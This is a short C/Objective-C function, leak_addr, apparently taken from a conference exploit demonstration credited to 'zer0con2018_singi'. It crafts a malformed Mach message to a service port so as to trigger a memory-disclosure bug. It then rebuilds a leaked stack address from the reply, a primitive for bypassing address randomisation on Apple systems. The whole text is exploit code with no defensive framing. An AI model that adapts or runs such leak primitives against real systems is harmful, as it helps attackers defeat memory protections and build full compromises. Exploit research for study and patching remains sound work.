void leak_addr()
{   
    mach_msg_return_t ret;
    leak_msg_t message;
    mach_port_t replyPort = mig_get_reply_port();
    memset(&message, 0, sizeof(message));
    message.header.msgh_remote_port = getport;
    message.header.msgh_local_port = replyPort;
    message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    message.header.msgh_size = 36;
    message.header.msgh_id = 0x7210 + 0xff;
    message.NDR = NDR_record;
    message.size = 0;
    message.leak_addr = 0x1337; //if trigger leak bug successfully, it will be change to stack value.
    ret = mach_msg(&(message.header), MACH_SEND_MSG | MACH_RCV_MSG,
                    36, 0xffff, replyPort,
                    MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    if(ret != MACH_MSG_SUCCESS) {
        NSLog(@"mach_msg fail.\n");
        mach_error("mach_msg:" , ret);
    }
    stack_addr = 0x7fff00000000 | message.leak_addr;
}



reference : zer0con2018_singi
